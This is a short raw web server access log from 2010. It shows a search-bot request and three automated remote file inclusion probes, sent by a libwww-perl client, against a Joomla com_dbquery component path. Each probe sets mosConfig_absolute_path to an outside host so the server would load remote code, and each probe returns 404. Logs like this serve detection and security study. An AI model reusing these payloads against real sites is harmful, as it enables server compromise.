65.55.115.150 - - [28/Feb/2010:21:46:17 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:21:46:30 -0800] "GET /logs/access_090720.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:21:46:30 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
199.120.90.223 - - [28/Feb/2010:21:46:31 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "www.galf.org"
